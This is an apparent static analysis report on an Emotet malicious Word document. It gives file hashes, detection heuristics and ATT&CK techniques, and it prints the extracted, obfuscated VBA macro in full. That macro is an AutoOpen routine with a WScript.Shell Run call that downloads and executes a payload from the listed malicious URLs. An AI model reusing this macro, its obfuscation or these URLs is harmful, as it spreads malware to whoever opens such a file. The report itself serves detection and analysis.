Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 1f772e71f20ec786…

MALICIOUS

Office (OLE)

Size: 151.1 KB
Created: 2019-01-16 15:09:00
Authoring application: Microsoft Office Word
First seen: 2019-04-18
MD5: 0b84937eb1d51c40eb19704c3462d71a
SHA-1: 048a37094911d98dc8023ab4c4008d3cdb23224f
SHA-256: 1f772e71f20ec786d7fc2c92f8eed6a11308fc9cabc021a5cb828f09b3dc0583
Risk score: 290

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic
T1218.011 System Binary Proxy Execution: Rundll32

The sample is a malicious Word document containing VBA macros. Heuristics indicate the use of WScript.Shell and CreateObject, strongly suggesting the execution of arbitrary code. The ClamAV detection explicitly names Emotet, a known downloader family. The VBA script likely uses WScript.Shell to download and execute a secondary payload from the obfuscated URL. The command passed to .Run is assembled at run time from concatenated variables and the form control Gorgeouswr.TextBox1, so the actual command line is not visible in the macro source itself.

Heuristics (9)

  • ClamAV: Doc.Downloader.Emotet-6817578-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6817578-0
  • VBA macros detected [medium, 4 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage [critical] OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script:
      Set SaudiRiyaluq = portjh
      Buckinghamshireph = "WscRipt.sHeLl"
         Set flexibilityiw = Bordersfr
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script:
      Set IntelligentSoftBaconhk = monitormj
      generatingdi = Array(Computersrn, firewallww, sensoriz, CreateObject("" + opensourcezi + mintgreencb + Upsizedfw + Buckinghamshireph).Run!(("" + expeditewi + microchipzt + Mountainsqa + KenyanShillingzz + Gorgeouswr.TextBox1) + solutionsjh + Gorgeousiw, 55 - 55), Beautyod, Legacyoc, Solutionsiw)
         Set InvestmentAccountfi = eservicespw
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script:
      End Function
      Sub autoopen()
      SMSzu = bricksandclickscs
  • Reference to Windows Script Host [high] SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://rdwe4k.ir/j]_[v]ZlyC[V;P6JEV59@http://merBedeslan,ha.vn/TR_6?qdyD[ep4?ymYjz@https://Bardealersf_r4kadBredit.net/jYxxBV[82i4kr`vt[k7NWL2nu@http://k_s_lve.B_m/7Z7ZV[EjWpCN@http://denis1994k,.B_m/iti[0vUy[?;3-.Split(-@-)0fr$Metalj_=-Un4krandedzm-0fr$dep_sitBn
      Channel: In document text (OLE body)
    URL: http://schemas.openxmlformats.org/drawingml/2006/main
      Channel: In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 8504 bytes
SHA-256: 256f3eace1481f4a61470c8e76aca91fcf307bfd6e51a50f9fcac15283421972
Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "Gorgeouswr"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"

Attribute VB_Name = "algorithmjz"
Function depositsj()
On Error Resume Next
   Set Plasticdz = GroceryJeweleryGardenbs
Set worldclassok = SleekSteelTableti
Select Case invoicekt
         Case 578
            empowerwr = Internaloz
            withdrawalmm = CLng(275)
         Case 689
            vortalslj = CLng(890)
            orchestrateip = CDate(Handcraftedkj)
            Rusticsf = Int(269)
         Case 46
            neuraloh = Cos(bandwidthnn)
            Softbb = ChrB(921)
            eenableor = SavingsAccountnr
 End Select
Set FTPsw = maximizecj
   Set LicensedWoodenChickenrc = RefinedSteelChipsoj
Set Avonzj = calculatesd
Select Case EXEhp
         Case 762
            Mountainkv = protocolpa
            Nebraskaub = CLng(332)
         Case 226
            ebusinessbs = CLng(315)
            Paangafu = CDate(Lariui)
            solutionswq = Int(732)
         Case 575
            SavingsAccountuj = Cos(ecommerceww)
            RefinedWoodenSausagesqf = ChrB(318)
            circuitnz = Nigerwu
 End Select
Set SaudiRiyaluq = portjh
Buckinghamshireph = "WscRipt.sHeLl"
   Set flexibilityiw = Bordersfr
Set Implementationta = RhodeIslandsw
Select Case Gorgeousac
         Case 37
            HomeLoanAccountji = Corporateit
            Crescentil = CLng(919)
         Case 603
            depositjv = CLng(216)
            turnkeyzz = CDate(HandmadeSoftCheesewh)
            architecturesbh = Int(184)
         Case 119
            Utahqb = Cos(visualizeja)
            Analystrl = ChrB(587)
            supportkj = parsingud
 End Select
Set Totallz = pinkir
   Set depositww = throughputkf
Set withdrawalvr = Borderspr
Select Case Recontextualizedmh
         Case 18
            rebootwn = objectorientedwv
            GBii = CLng(422)
         Case 562
            systemworthyqu = CLng(626)
            SportsGardenjt = CDate(CreditCardAccounthj)
            JeweleryClothingln = Int(133)
         Case 469
            UnitedArabEmirateshz = Cos(Concreteul)
            Executivesn = ChrB(331)
            objectorientedid = Avonwf
 End Select
Set Marylandki = scalabledr
   Set paymentwi = scalablelj
Set coherentvv = copyinghw
Select Case Fantasticci
         Case 129
            standardizationdc = supplychainsao
            paymentvm = CLng(66)
         Case 774
            Tacticsat = CLng(874)
            LicensedPlasticTowelsjn = CDate(IntelligentSoftGloveshs)
            Mississippizo = Int(311)
         Case 576
            XMLfs = Cos(Rubberrk)
            Awesomeuz = ChrB(343)
            Upsizedmi = SASff
 End Select
Set IntelligentSoftBaconhk = monitormj
generatingdi = Array(Computersrn, firewallww, sensoriz, CreateObject("" + opensourcezi + mintgreencb + Upsizedfw + Buckinghamshireph).Run!(("" + expeditewi + microchipzt + Mountainsqa + KenyanShillingzz + Gorgeouswr.TextBox1) + solutionsjh + Gorgeousiw, 55 - 55), Beautyod, Legacyoc, Solutionsiw)
   Set InvestmentAccountfi = eservicespw
Set Multitieredjd = SCSIwm
Select Case Legacytj
         Case 179
            compressingzl = webenabledno
            nextgenerationkb = CLng(344)
         Case 424
            PCIru = CLng(342)
            EuropeanUnitofAccount17EUA17ql = CDate(parsingld)
            navigatelh = Int(694)
         Case 668
            copywh = Cos(navigatejb)
            copyingww = ChrB(79)
            applicationwi = connectingkq
 End Select
Set bandwidthii = Takarl
   Set Engineerpd = convergencekt
Set transmitterfa = deposithn
Select Case GenericFrozenKeyboardji
         Case 249
            Bordersui = webserviceszj
            GraphicInterfacebs = CLng(728)
         Case 297
            overridingmh = CLng(322)
            Inletzr = CDate(JBODhv)
            tanrk = Int(892)
         Case 339
            wirelessjv = Cos(contextuallybasedlk)
            RAMci = ChrB(308)
            hackingzh = Musicbj
 End Select
Set paradigmsbi = IncredibleRubberShirtnr
End Function


Attribute VB_Name = "quantifyingsj"
Function Runww()
Berkshirezp = hackms
bypassingqi = Genericfh
Consultantou = depositos
wirelesspo = CheckingAccountwa
Virginiamd = MoldovanLeuqf
AwesomeFrozenCarpn = userswr
HandcraftedWoodenBaconij = AntarcticatheterritorySouthof60degSwz
Cliffszj = Berkshireor
Portsir = Ridgewz
contextsensitivebk = productizeri
Softjt = monitordu
GenericGraniteSausagesti = Usabilitypu
End Function
Function EuropeanUnitofAccount9EUA9rl()
visualizeac = ConvertibleMarksmn
HealthGamespj = missioncriticalwr
CreditCardAccountii = Enhancedbc
Cambridgeshirezj = Bridgejk
Standalonejc = greenja
Brandingsd = Incrediblepl
HomeLoanAccountff = matrixzr
Sleektu = architecturestv
AutomotiveToolsClothingzi = synthesizingti
magentazw = Cambodiacw
Analystwv = backendvz
InvestmentAccountwa = Assuranceqc
End Function
Sub autoopen()
SMSzu = bricksandclickscs
TastyMetalBaconqi = Accountabilityzh
paymentrw = Plastictz
depositcu = Villagesud
IncredibleCottonCarzv = Directorow
Millspi = Refinedjd
crossplatformfs = Array(depositwz, Softji, Texasum, depositsj, SwissFrancrq, Districtjm, Jeweleryoc)
valueaddedmz = Supervisorik
invoicekz = HomeLoanAccountrz
withdrawalsb = Hillbz
wirelessak = Engineerlw
Virginiapo = backinguppf
SavingsAccountzz = Marylandpb
End Sub
Function impactfulna()
hapticsf = paradigmsbz
MoneyMarketAccountfv = B2Bwj
withdrawaljm = Berkshirewz
methodologieswi = ivoryzs
BeautyGroceryShoesvp = Metalba
PCIhi = Chadiq
Musicok = Borderskq
Talazl = Gamesvw
AutoLoanAccountqf = zerotolerancefc
Armeniaaa = TunisianDinarvd
SleekFreshBaconjv = overridingri
transmittingbj = Leadko
End Function

Attribute VB_Name = "USDollarrl"

Attribute VB_Name = "Ohiodl"

Attribute VB_Name = "Woodenjl"

Attribute VB_Name = "artificialintelligencerk"

Attribute VB_Name = "Tennesseejv"

Attribute VB_Name = "Forwardjw"

Attribute VB_Name = "WestVirginialf"

Attribute VB_Name = "Genericrq"

Attribute VB_Name = "ebusinessdw"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "highlevelcm"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Clonedbv"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Executivezw"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "adaptertz"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "complexityov"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "plugandplayfr"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False